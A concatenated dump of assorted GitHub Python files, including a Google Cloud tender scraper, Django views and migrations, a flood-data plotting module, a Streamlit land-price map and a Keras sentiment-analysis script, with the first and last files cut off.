import By\r\n\r\n# Imports the Cloud Logging client library\r\nimport google.cloud.logging\r\n# Imports Python standard library logging\r\nimport logging\r\n\r\nimport chromedriver_binary # Adds chromedriver binary to path\r\nfrom lxml import html\r\nfrom sqlalchemy import Table, Column, Integer, String, MetaData, Text, Boolean, DateTime, ForeignKey, BigInteger, \\\r\n create_engine, insert # Python SQL toolkit essentials\r\n\r\n# Instantiates a client for logging\r\nclient = google.cloud.logging.Client()\r\n\r\n# Retrieves a Cloud Logging handler based on the environment\r\n# you're running in and integrates the handler with the\r\n# Python logging module. By default this captures all logs\r\n# at INFO level and higher\r\nclient.get_default_handler()\r\nclient.setup_logging()\r\n\r\n# Create a client for tasks API.\r\nclient = tasks_v2.CloudTasksClient()\r\n\r\n# Tasks API Configuration\r\nproject = 'tenders-284621'\r\nqueue = 'scraping-queue'\r\nlocation = 'europe-west1'\r\nBASEURL = os.environ[\"BASEURL\"]\r\npayload = None\r\ntask_name = None\r\n\r\n\r\n# client-cert, client-key, server-ca\r\ndef create_pem(pem_type, pem_content):\r\n with open(pem_type+\".pem\", \"w+\", encoding='utf8', newline='\\n') as fh:\r\n fh.write(pem_content[:pem_content.find('-----', 1)+5]+'\\n')\r\n \r\n value = pem_content[pem_content.find('-----', 1)+5:pem_content.rfind('-----END')]\r\n for i in range(0, len(value) // 64):\r\n fh.write(value[64*i:64*(i+1)]+'\\n')\r\n if (len(value) % 64 != 0):\r\n fh.write(value[64*(len(value)//64)::]+'\\n') \r\n \r\n fh.write(pem_content[pem_content.rfind('-----END'):])\r\n\r\n os.chmod(pem_type+\".pem\", 0o600)\r\n fh.close()\r\n\r\n\r\n# Create the Secret Manager client.\r\nsecrets_client = secretmanager.SecretManagerServiceClient()\r\n\r\n# Access the secret version.\r\nclient_cert = secrets_client.access_secret_version(request={\"name\": \"projects/\"+project+\"/secrets/db-client-cert/versions/1\"}).payload.data.decode(\"utf-8\")\r\nclient_key = secrets_client.access_secret_version(request={\"name\": \"projects/\"+project+\"/secrets/db-client-key/versions/1\"}).payload.data.decode(\"utf-8\")\r\nserver_ca = secrets_client.access_secret_version(request={\"name\": \"projects/\"+project+\"/secrets/db-server-ca/versions/1\"}).payload.data.decode(\"utf-8\")\r\n\r\n\r\ncreate_pem('client-cert', base64.b64decode(client_cert).decode(\"utf-8\"))\r\ncreate_pem('client-key', base64.b64decode(client_key).decode(\"utf-8\"))\r\ncreate_pem('server-ca', base64.b64decode(server_ca).decode(\"utf-8\"))\r\n\r\n\r\n\r\n# Google Cloud SSL Configuration\r\nssl_args = {'sslrootcert':'server-ca.pem',\r\n 'sslcert':'client-cert.pem',\r\n 'sslkey':'client-key.pem'}\r\n\r\n# Construct the fully qualified queue name.\r\nparent = client.queue_path(project, location, queue)\r\n\r\n# Link containing all tenders\r\nMAINLINK = \"https://www.swz.kghm.pl/servlet/HomeServlet?MP_module=main&MP_action=noticeList&demandType=nonpublic\"\r\n# Postgresql connection strings\r\nDATABASE_HOST = os.environ[\"DATABASE_HOST\"]\r\nDATABASE_CREDENTIALS = secrets_client.access_secret_version(request={\"name\": \"projects/\"+project+\"/secrets/credentials/versions/1\"}).payload.data.decode(\"utf-8\")\r\n\r\ntime_in_between = 15\r\n\r\n# Set log file and log level (INFO/DEBUG)\r\nlogging.info(\"=================================================================================\")\r\nlogging.info(\"Scraping all tenders started\")\r\n\r\n# The following options are required to make headless Chrome work in a Docker container\r\nchrome_options = webdriver.ChromeOptions()\r\nchrome_options.add_argument(\"--headless\")\r\nchrome_options.add_argument(\"--disable-gpu\")\r\nchrome_options.add_argument(\"window-size=1024,768\")\r\nchrome_options.add_argument(\"--no-sandbox\")\r\n\r\n# Initialize a new browser\r\ntry:\r\n browser = webdriver.Chrome(\r\n options=chrome_options)\r\nexcept Exception as e:\r\n logging.fatal(\"Browser didn't start - {}\".format(str(e)))\r\n sys.exit(1)\r\n\r\nlogging.info(\"Browser started\")\r\n\r\n# Connect to database\r\nDATABASE_URI = \"postgresql://\" + DATABASE_CREDENTIALS + \"@\" + DATABASE_HOST\r\ntry:\r\n engine = create_engine(DATABASE_URI, connect_args=ssl_args)\r\n connection = engine.connect()\r\nexcept Exception as e:\r\n logging.fatal(\"Can't connect to Postgresql - {}\".format(str(e)))\r\n browser.quit()\r\n sys.exit(1)\r\n\r\n# Retrieve notices table\r\nmetadata = MetaData(schema=\"tenders\")\r\nnotices_table = Table('notices', metadata, autoload=True, autoload_with=engine)\r\n\r\n# Access link and scrape notices general information\r\nbrowser.get(MAINLINK)\r\ntime.sleep(2)\r\n\r\nlogging.info(\"Site opened\")\r\nelem = wait(browser, 5).until(EC.presence_of_element_located((By.XPATH,\r\n '//select[contains(@name, \"GD_pagesize\")]')))\r\nelem.click()\r\nelem = wait(browser, 5).until(EC.presence_of_element_located((By.XPATH,\r\n '//select[contains(@name, \"GD_pagesize\")]/option[@value=\"100\"]')))\r\nelem.click()\r\ntime.sleep(2)\r\ntree = html.fromstring(browser.page_source)\r\ncount_check = tree.xpath(\r\n 'string(count(//table[contains(@class, \"bodybox\")]//tr[@onmouseover]//img[@src=\"/pic/mp/details.gif\"]/../@href))')\r\n\r\nlogging.info('Number of tenders: {}'.format(count_check))\r\n# Will contain all new notices\r\nnotices = []\r\nin_seconds = time_in_between\r\nfor attr in tree.xpath('//table[contains(@class, \"bodybox\")]//tr[@onmouseover]'):\r\n url = attr.xpath('string(.//img[@src=\"/pic/mp/details.gif\"]/../@href)')\r\n if url:\r\n id_ = url.split(\"iRfxRound=\")[-1]\r\n\r\n date_published_string = attr.xpath(\r\n 'normalize-space(string(.//td[4]))')\r\n\r\n query = notices_table.select().where(notices_table.c.id == id_)\r\n result = connection.execute(query)\r\n\r\n length = 0\r\n for row in result:\r\n length += 1\r\n\r\n date_published = date_published_string[:16]\r\n date_published = time.mktime(datetime.datetime.strptime(date_published, \"%Y-%m-%d %H:%M\").timetuple())\r\n\r\n # Notice never scraped\r\n if (length == 0): \r\n # Construct the request body.\r\n url = BASEURL +str(id_)+'/'+str(date_published)[:-2] \r\n task = {\r\n 'http_request': { # Specify the type of request.\r\n 'http_method': 'GET',\r\n 'url': url # The full url path that the task will be sent to.\r\n }\r\n }\r\n\r\n # Create task to run in cloud\r\n if payload is not None:\r\n if isinstance(payload, dict):\r\n # Convert dict to JSON string\r\n payload = json.dumps(payload)\r\n # specify http content-type to application/json\r\n task['http_request']['headers'] = {'Content-type': 'application/json'}\r\n\r\n # The API expects a payload of type bytes.\r\n converted_payload = payload.encode()\r\n\r\n # Add the payload to the request.\r\n task['http_request']['body'] = converted_payload\r\n\r\n if in_seconds is not None:\r\n # Convert \"seconds from now\" into an rfc3339 datetime string.\r\n d = datetime.datetime.utcnow() + datetime.timedelta(seconds=in_seconds)\r\n\r\n # Create Timestamp protobuf.\r\n timestamp = timestamp_pb2.Timestamp()\r\n timestamp.FromDatetime(d)\r\n\r\n # Add the timestamp to the tasks.\r\n task['schedule_time'] = timestamp\r\n\r\n if task_name is not None:\r\n # Add the name to tasks.\r\n task['name'] = task_name\r\n\r\n # Use the client to build and send the task.\r\n response = client.create_task(parent, task)\r\n logging.info('Created task {} for tender #{} at {}'.format(response.name, id_, url))\r\n\r\n # Increment in_seconds to seperate workload\r\n in_seconds += time_in_between\r\n\r\n # py scrape_id.py notice date_published\r\n notices.append({\r\n \"tender_id\": id_,\r\n \"date_published\": str(date_published)[:-2]\r\n })\r\n\r\nbrowser.quit()\r\nfor notice in notices:\r\n logging.info(notice)\r\nlogging.info(\"Script completed with {} new notices.\".format(len(notices)))\r\nlogging.info(\"=================================================================================\")\r\n","repo_name":"wassimbouzazi/Tenders-Scraper","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":8848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28779587556","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\n\ndef exercise1(request):\n return HttpResponse(\"

안녕하세요? 최서영이 만든 첫 장고 웹페이지입니다.

\")\n# Create your views here.\n\ndef exercise2(request):\n if request.method == 'POST':\n na = request.POST['name']\n opi = request.POST['opinion']\n context = {'na' : na, 'opi' : opi}\n else:\n context = None\n return render(request, 'exercise2.html', context)\n\ndef product1(request):\n template = loader.get_template('product1.html')\n context = {'pid' : ['p001','p002','p003','p004','p005','p006','p007','p008','p009','p010']}\n return HttpResponse(template.render(context, request))\n\ndef basket1(request, pid):\n context = {\n 'pid': pid,\n }\n return render(request, 'basket1.html', context)","repo_name":"cseoy73/ExerciseProject-Web","sub_path":"workapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22032115226","text":"import numpy as np\n\ndummy = 1.0\n\ndef compute_a():\n a = dummy**2 \n return a\n\ndef compute_b(dummy1):\n a = dummy1**2\n return a\n\ndef check(dummy):\n dummy = 3.0\n print( 'value a =',compute_a(), 'value b =', compute_b(dummy))\nt = 0\nwhile t <10:\n \n dummy = 2.0\n check(dummy)\n \n t +=1\n\n\n","repo_name":"skkmaths/claw","sub_path":"1dscalar/bug.py","file_name":"bug.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33338577964","text":"# coding: utf-8\nfrom os import path\nfrom PIL import Image\nimport numpy as np\nfrom wordcloud import WordCloud, STOPWORDS\nfrom Python3.DataAnalysis import *\n\n\nclass Cloud:\n\n def __init__(self):\n '''\n - 通过self.site控制分析方向,选择文件夹\n - 生成DataAnalysis实例,借用jieba分词部分代码\n - 加载文本字符串和底片\n '''\n self.site = 'up'\n self.d = path.dirname(__file__)\n self.text_ = open(path.join(self.d,'Data/'+self.site+'/txt.txt')).read()\n\n da = DataAnalysis()\n da.Initialization()\n\n self.text = ','.join(str(i) for i in da.process(self.text_,da.stopwordTxt))\n self._mask = np.array(Image.open(path.join(self.d,\"Settings/bit_mask.png\")))\n\n def getCloud(self):\n '''\n - 生成WordCloud对象,设置背景色,云词数量,底片,及中文字体\n - 使用WordCloud处理文本\n - 输出图像\n - 运行时显示结果图片\n - 运行时显示底片\n\n :return:\n '''\n\n wc = WordCloud(background_color=\"white\", max_words=100, mask=self._mask,font_path=\"Settings/simsun.ttf\")\n wc.generate(self.text)\n wc.to_file(path.join(self.d, \"picture/bit.png\"))\n\n plt.imshow(wc, interpolation='bilinear')\n plt.axis(\"off\")\n plt.figure()\n plt.imshow(self._mask, cmap=plt.cm.gray, interpolation='bilinear')\n plt.axis(\"off\")\n plt.show()\n\ncl = Cloud()\ncl.getCloud()","repo_name":"orekiku/WeiBoDataMining","sub_path":"Cloud.py","file_name":"Cloud.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30542401044","text":"file = open(\"./input.txt\", \"r\")\nall = []\ntwos_count = 0\nthrees_count = 0\nfor str in file:\n all.append(str.strip())\n char_counts = {}\n for char in str.strip():\n count = char_counts.get(char, 0)\n char_counts[char] = count + 1\n\n has_two = False\n has_three = False\n for x,y in char_counts.items():\n if y == 3:\n has_three = True\n if y == 2:\n has_two = True\n if has_two:\n twos_count += 1\n if has_three:\n threes_count += 1\n #print(list(filter(lambda x: x == 3, char_counts.items())))\nprint(\"Part 1:\", twos_count * threes_count)\n\nscores = {}\nfor index, word in enumerate(all):\n for index2, word2 in enumerate(all):\n # if index == index2:\n # continue\n score = 0\n for i in range(0, len(word)):\n if word[i] != word2[i]:\n score += 1\n a = scores.get(score, None)\n if a == None:\n a = { 'words': [] }\n a['words'].append(word)\n a['words'].append(word2)\n scores[score] = a\nprint(set(scores[1]['words']))\n# part 2 answer: zihwtxagifpbsnwleydukjmqv\n","repo_name":"rashkov/aoc18","sub_path":"2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73562458707","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport os.path\n\nfrom django.db import models, migrations\n\n\ndef set_filenames(apps, schema_editor):\n # We can't import the ProgramFile model directly as it may be a newer\n # version than this migration expects. We use the historical version.\n ProgramFile = apps.get_model(\"microstructure\", \"ProgramFile\")\n for pfile in ProgramFile.objects.all():\n pfile.filename = os.path.basename(pfile.file.name)\n pfile.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('microstructure', '0002_auto_20140903_1959'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='programfile',\n name='filename',\n field=models.CharField(default='', max_length=512),\n preserve_default=False,\n ),\n migrations.RunPython(set_filenames),\n ]\n","repo_name":"cchdo/ustructure","sub_path":"microstructure/migrations/0003_programfile_filename.py","file_name":"0003_programfile_filename.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73656732306","text":"from optparse import Values\nimport matplotlib.pyplot as plt\nfrom floodsystem.analysis import polyfit\nimport matplotlib\nimport numpy as np\nfrom datetime import datetime, timedelta\nfrom floodsystem.datafetcher import fetch_measure_levels\ndef plot_water_levels(station, dates, levels):\n \"plots time series of level data\"\n \n \n\n \n\n # Plots available level data\n \n plt.plot(dates, levels)\n # checks if historic level data is available\n if not levels:\n # if not, ignores and prints a warning\n print(\"Past Level Data Unavailable\")\n else:\n # if available, plots lines of maximum/minimum levels\n plt.plot(dates, [station.typical_range[0]]*len(dates))\n plt.plot(dates, [station.typical_range[1]]*len(dates))\n \n # set up plot nicely\n plt.xlabel('date')\n plt.ylabel('water level (m)')\n plt.xticks(rotation=45);\n plt.title(station.name)\n plt.tight_layout() \n # plot\n plt.show()\n\n\ndef plot_water_level_with_fit(station, dates, levels, p):\n x = matplotlib.dates.date2num(dates)\n y = levels\n plt.plot(x, y, '.')\n if dates:\n poly, d0 = polyfit(dates, levels, p)\n x1 = np.linspace(d0, x[-1], 30)\n plt.plot(x1, poly(x1 - d0))\n plt.plot(dates, [max(levels)]*len(dates))\n plt.plot(dates, [min(levels)]*len(dates))\n plt.xlabel('date')\n plt.ylabel('water level (m)')\n plt.xticks(rotation=45);\n plt.title(station.name)\n plt.tight_layout() \n plt.show()\n else:\n return None\n","repo_name":"ParthVader02/Flood-System-142","sub_path":"floodsystem/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72631575827","text":"\"\"\"empty message\n\nRevision ID: fa7b0f719596\nRevises: 83ce577adf07\nCreate Date: 2023-08-23 17:27:37.392844\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fa7b0f719596'\ndown_revision = '83ce577adf07'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('data_pelanggaran', schema=None) as batch_op:\n batch_op.drop_constraint('data_pelanggaran_ibfk_4', type_='foreignkey')\n batch_op.create_foreign_key(None, 'detail_guru', ['guru_id'], ['id'])\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('data_pelanggaran', schema=None) as batch_op:\n batch_op.drop_constraint(None, type_='foreignkey')\n batch_op.create_foreign_key('data_pelanggaran_ibfk_4', 'detail_guru', ['guru_id'], ['id'], onupdate='CASCADE', ondelete='CASCADE')\n\n # ### end Alembic commands ###\n","repo_name":"ariefendi992/sistem-monitoring","sub_path":"migrations/versions/fa7b0f719596_.py","file_name":"fa7b0f719596_.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"10244008132","text":"def checkBanana(amnt_banana,amnt,b_count):\r\n if(amnt <1000 and amnt_banana <1000 and b_count <1000):\r\n b_cost=0\r\n for i in range(1,b_count+1):\r\n b_cost=b_cost+i*amnt_banana\r\n print(b_cost)\r\n if(b_cost len(pikim):\n pikim = lemma\nprint(pikim)\n ","repo_name":"NFilin10/TU_programming_course","sub_path":"praksid/praks_5/pikim.py","file_name":"pikim.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72238346386","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path(\"\", views.SongsView.as_view()),\n path(\"artists/\", views.ArtistsView.as_view()),\n path(\"filter/\", views.FilterSongsView.as_view(),name = 'filter'),\n path(\"/\", views.ArtistDetailView.as_view(), name='artist_details'),\n path(\"/\", views.SongDetailView.as_view(), name='song_details'),\n\n]","repo_name":"YernurShamshadin/dj1project","sub_path":"kz_musics/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"75163371984","text":"import streamlit as st\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport geopandas as gpd \r\n\r\nfrom pyproj import CRS \r\n#import xyzservices.providers as xyz \r\n\r\nfrom bokeh.models import ColumnDataSource\r\nfrom bokeh.plotting import figure, output_notebook, show\r\nfrom bokeh.models.mappers import LogColorMapper\r\nfrom bokeh.palettes import RdYlGn10 as palette\r\nfrom bokeh.models import ColumnDataSource,HoverTool, Select\r\nfrom bokeh.transform import transform\r\nfrom bokeh.layouts import column\r\nfrom bokeh.models import CustomJS, Select\r\nfrom bokeh.models import ColorBar\r\n\r\n\r\n#tile_provider = get_provider(Vendors.OSM)\r\n\r\nst.title(\"_:blue[Land Prices]_ :moneybag: :cityscape:\")\r\n\r\nst.subheader(\"The app you need! :sunglasses:\")\r\n\r\n\r\n# No need to change the functions from the quick start\r\ndef getPolyCoords(row, geom, coord_type):\r\n \r\n if row[geom].geom_type == \"MultiPolygon\":\r\n g_obj = row[geom].geoms[0]\r\n else:\r\n g_obj = row[geom] \r\n if coord_type == 'x':\r\n return list(g_obj.exterior.coords.xy[0])\r\n elif coord_type == 'y':\r\n return list(g_obj.exterior.coords.xy[1])\r\n\r\ndef transform_gdf(gdf):\r\n \r\n gdf['x'] = gdf.apply(getPolyCoords, geom = 'geometry', coord_type = 'x', axis = 1)\r\n gdf['y'] = gdf.apply(getPolyCoords, geom = 'geometry', coord_type = 'y', axis = 1)\r\n p_df = gdf.drop('geometry', axis = 1).copy()\r\n \r\n return p_df\r\n\r\n# Settings\r\ncities = [\"Berlin\", \"Bremen\" ,\"Dresden\", \"Frankfurt_am_Main\", \"Köln\"]\r\n\r\n\r\n# Enable notebook output\r\noutput_notebook()\r\n\r\n# Neighborhood is built inside the loop.\r\nneighborhood = gpd.GeoDataFrame()\r\nranges = {}\r\n\r\n# THIS NEEDS TO BE 3857 and not what was in the example notebook (3395). Otherwise Frankfurt is in Darmstadt :/\r\nmercator_crs = CRS.from_user_input(3857)\r\n\r\nmerged_cities = pd.read_csv(f\"../data/interim/nb_level_merged_all_cities_with_amenties.csv\")\r\n\r\nfor city in cities:\r\n\r\n neighborhoods_in_city = gpd.read_file(f\"../data/raw/3 Neighborhoods/Neighborhoods_{city}.gpkg\")\r\n\r\n land_prices = pd.read_csv(f\"../data/raw/1 Land Prices/Land_Prices_Neighborhood_{city}.csv\", sep = \";\")\r\n\r\n neighborhoods_in_city = pd.merge(neighborhoods_in_city, land_prices, on='Neighborhood_FID', how='left')\r\n\r\n all_city_data = merged_cities.query(\"City_Name == @city\")\r\n\r\n neighborhoods_in_city = pd.merge(neighborhoods_in_city, all_city_data, on='Neighborhood_Name', how='left', suffixes=(\"\", \"_\")) \r\n\r\n neighborhoods_in_city[\"Land_Value\"] = neighborhoods_in_city[\"Land_Value\"].round(0)\r\n\r\n\r\n neighborhood = pd.concat([neighborhood, neighborhoods_in_city])\r\n\r\n ranges[city] = {\r\n \"x\": (neighborhoods_in_city.to_crs(mercator_crs).total_bounds[0], neighborhoods_in_city.to_crs(mercator_crs).total_bounds[2]),\r\n \"y\": (neighborhoods_in_city.to_crs(mercator_crs).total_bounds[1], neighborhoods_in_city.to_crs(mercator_crs).total_bounds[3])\r\n } \r\n\r\nneighborhood_mercator = neighborhood.to_crs(mercator_crs)\r\nneighborhood_b = transform_gdf(neighborhood_mercator)\r\n\r\nx_range = ranges[cities[0]][\"x\"]\r\ny_range = ranges[cities[0]][\"y\"]\r\nmapper = LogColorMapper(palette = palette)\r\n\r\n\r\np = figure(title = f\"Neighborhoods in {cities[0]}\", x_range=x_range, y_range=y_range,\r\n x_axis_type=\"mercator\", y_axis_type=\"mercator\", match_aspect=False)\r\n \r\np.patches('x', 'y', source = ColumnDataSource(neighborhood_b), line_color = \"grey\", line_width = 0.8,\r\n fill_color= transform('Land_Value',mapper),\r\n fill_alpha = 0.7)\r\n\r\ncb = ColorBar (color_mapper = mapper, location = (5,6))\r\np.add_layout(cb, 'right')\r\n#p.add_tile(tile_provider)\r\n\r\nTOOLTIPS = [\r\n (\"Neighborhood\", \"@Neighborhood_Name\"),\r\n (\"Land Value\", \"@Land_Value €/m2\"),\r\n (\"Area count\", \"@Area_Count\"),\r\n (\"Living area below 30 sqm\", \"@w_less_30\"),\r\n (\"Restaurants\", \"@restaurant\"),\r\n (\"Fountains\", \"@fountain\")\r\n \r\n]\r\n\r\np.add_tools(HoverTool(tooltips=TOOLTIPS))\r\n\r\ncallback = CustomJS(\r\n args = dict(xr = p.x_range, yr = p.y_range, locations = ranges, title = p.title),\r\n code = \"\"\"\r\n\r\n var select_vals = cb_obj.value;\r\n\r\n title.text = `Neighborhoods in ${select_vals}`;\r\n\r\n xr.start = locations[select_vals][\"x\"][0];\r\n xr.end = locations[select_vals][\"x\"][1];\r\n yr.start = locations[select_vals][\"y\"][0];\r\n yr.end = locations[select_vals][\"y\"][1];\r\n\"\"\")\r\n\r\nselect = Select(title=\"Select city:\", value=cities[0], options=cities)\r\nselect.js_on_change(\"value\", callback)\r\n\r\nlayout = column(select , p)\r\nshow(layout)\r\n\r\nst.markdown(\"**Land prices in ...**\")\r\nst.bokeh_chart(layout, use_container_width=True)\r\n\r\n\r\nst.markdown(\"**What should you care to sell your property for higher prices?**\")\r\n\r\n\r\n\r\nfrom bokeh.plotting import figure\r\nfrom bokeh.models import ColumnDataSource\r\nfrom bokeh.palettes import Spectral10\r\nfrom bokeh.transform import factor_cmap\r\nfrom bokeh.io import show\r\nimport streamlit as st\r\n\r\nfeatures = ['Living space less than 30 sqm', 'Restaurants', 'Fountains', 'Benchs', 'Unusual apartment type', 'Holding German and other pass', 'Greek', 'EU27 pass', 'Waste bin', 'Cafe']\r\ncounts = [178, 124, 102, 81, 76, 76, 75, 74, 70, 68]\r\n\r\nsource = ColumnDataSource(data=dict(features=features, counts=counts, color=Spectral10))\r\n\r\n# sorting the bars means sorting the range factors\r\nsorted_features = sorted(features, key=lambda x: counts[features.index(x)], reverse=False)\r\n\r\n\r\nfeature_chart = figure(y_range=sorted_features, plot_height=350, plot_width=600, title=\"Most Important Features\",\r\n toolbar_location=None, tools=\"\")\r\n\r\nfeature_chart.hbar(y='features', right='counts', height=0.8, source=source, \r\n color=factor_cmap('features', palette=Spectral10, factors=sorted_features))\r\n\r\nfeature_chart.xgrid.grid_line_color = None\r\nfeature_chart.yaxis.major_label_text_font_size = \"12pt\"\r\nfeature_chart.axis.axis_line_color = None\r\nfeature_chart.outline_line_color = None\r\n\r\nst.bokeh_chart(feature_chart)","repo_name":"bozturk10/ifohack-landers-group","sub_path":"notebooks/streamlit.py","file_name":"streamlit.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20852179152","text":"\ndef search(list,n):\n\n\tfor i in range(len(list)):\n\t\tif list[i] == n:\n\t\t\treturn True\n\treturn False\n\n# list \nlist = [1, 2, 'apple', 4,'Grapes', 6]\n\n# Driver Code\nn = 'Grapes'\n\nif search(list, n):\n\tprint(\"Found\")\nelse:\n\tprint(\"Not Found\")\n","repo_name":"Shubhamrawat5/open-source-contribution","sub_path":"PYTHON/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"48"} +{"seq_id":"8162442949","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport matplotlib.pyplot as plt\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Embedding, LSTM, SpatialDropout1D\nfrom sklearn.model_selection import train_test_split\nfrom keras.utils.np_utils import to_categorical\nimport re\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\ndata = pd.read_csv('Comments.csv')\n# Keeping only the neccessary columns\ndata = data[['comment','label','language']]\n\ndata = data[data.label != \"neutral\"]\ndata['comment'] = data['comment'].apply(lambda x: x.lower())\ndata['comment'] = data['comment'].apply((lambda x: re.sub('[^a-zA-z0-9\\s]','',x)))\n\nprint(data[ data['label'] == 'positive'].size)\nprint(data[ data['label'] == 'negative'].size)\n\nfor idx,row in data.iterrows():\n row[0] = row[0].replace('rt',' ')\n \nmax_fatures = 2000\ntokenizer = Tokenizer(num_words=max_fatures, split=' ')\ntokenizer.fit_on_texts(data['comment'].values)\nX = tokenizer.texts_to_sequences(data['comment'].values)\nX = pad_sequences(X)\n\nembed_dim = 128\nlstm_out = 196\n\nmodel = Sequential()\nmodel.add(Embedding(max_fatures, embed_dim,input_length = X.shape[1]))\nmodel.add(SpatialDropout1D(0.4))\nmodel.add(LSTM(lstm_out, dropout=0.2, recurrent_dropout=0.2))\nmodel.add(Dense(2,activation='softmax'))\nmodel.compile(loss = 'categorical_crossentropy', optimizer='adam',metrics = ['accuracy'])\nprint(model.summary())\n\nY = pd.get_dummies(data['label']).values\nX_train, X_test, Y_train, Y_test = train_test_split(X,Y, test_size = 0.33, random_state = 42)\nprint(X_train.shape,Y_train.shape)\nprint(X_test.shape,Y_test.shape)\n\nbatch_size = 32\nhistory = model.fit(X_train, Y_train, epochs = 15, batch_size=batch_size, verbose = 1, validation_split=0.2)\n\ndef generate_graph(history):\n plt.plot(history.history['accuracy'], 'b')\n plt.plot(history.history['val_accuracy'], 'r')\n plt.title('Model Accuracy'),\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend(['Train', 'Validation'], loc='upper left')\n plt.show()\n\ngenerate_graph(history)\n\nvalidation_size = 1500\n\nX_validate = X_test[-validation_size:]\nY_validate = Y_test[-validation_size:]\nX_test = X_test[:-validation_size]\nY_test = Y_test[:-validation_size]\n# score,acc = model.evaluate(X_test, Y_test, verbose = 2, batch_size = 2)\n# print(\"score: %.2f\" % (score))\n# print(\"acc: %.2f\" % (acc))\n\npos_cnt, neg_cnt, pos_correct, neg_correct = 0, 0, 0, 0\nfor x in range(len(X_validate)):\n \n result = model.predict(X_validate[x].reshape(1,X_test.shape[1]),batch_size=1,verbose = 2)[0]\n \n if np.argmax(result) == np.argmax(Y_validate[x]):\n if np.argmax(Y_validate[x]) == 0:\n neg_correct += 1\n else:\n pos_correct += 1\n \n if np.argmax(Y_validate[x]) == 0:\n neg_cnt += 1\n else:\n pos_cnt += 1\n\n\n\nprint(\"pos_acc\", pos_correct/pos_cnt*100, \"%\")\nprint(\"neg_acc\", neg_correct/neg_cnt*100, \"%\")\n\ntwt = \"bati kaayo siya pagka maestra kay dili mutudlo ug tarong\"\n#vectorizing the tweet by the pre-fitted tokenizer instance\ntwt = tokenizer.texts_to_sequences(twt)\n#padding the tweet to have exactly the same shape as `embedding_2` input\ntwt = pad_sequences(twt, maxlen=21, dtype='int32', value=0)\nprint(twt)\nsentiment = model.predict(twt,batch_size=1,verbose = 2)[0]\nif(np.argmax(sentiment) == 0):\n print(\"negative\")\nelif (np.argmax(sentiment) == 1):\n print(\"positive\")\n\nlist_data = data.values.tolist()\n#function to get how many items in the dataset will be classified correctly\ndef getAccuracy():\n correct = 0\n miss = 0\n output = \"\"\n for entry in list_data:\n #vectorizing the tweet by the pre-fitted tokenizer instance\n twt = tokenizer.texts_to_sequences(entry[0])\n #padding the tweet to have exactly the same shape as `embedding_2` input\n twt = pad_sequences(twt, maxlen=21, dtype='int32', value=0)\n sentiment = model.predict(twt,batch_size=1)[0]\n if(np.argmax(sentiment) == 0):\n output = \"negative\"\n elif (np.argmax(sentiment) == 1):\n output = \"positive\"\n if(output == entry[1]):\n correct += 1\n else:\n miss += 1\n \n print(\"accuracy: \", correct/len(data['comment']))\n print(\"miss\", miss/len(data['comment']))\n print(\"correct: \", correct)\n print(\"miss\", miss)\n#get the cebuano, english prediction accuracy\ndef getLanguageAccuracy():\n #Count the number of cebuano and english comments\n countCebuano= sum(p[2] ==\"cebuano\" for p in list_data)\n countEnglish = sum(p[2] ==\"english\" for p in list_data)\n \n print(\"cebuano = \", countCebuano)\n print(\"english = \", countEnglish)\n\n ceb_correct = 0\n eng_correct = 0\n miss = 0\n\n for entry in list_data:\n #vectorizing the tweet by the pre-fitted tokenizer instance\n twt = tokenizer.texts_to_sequences(entry[0])\n #padding the tweet to have exactly the same 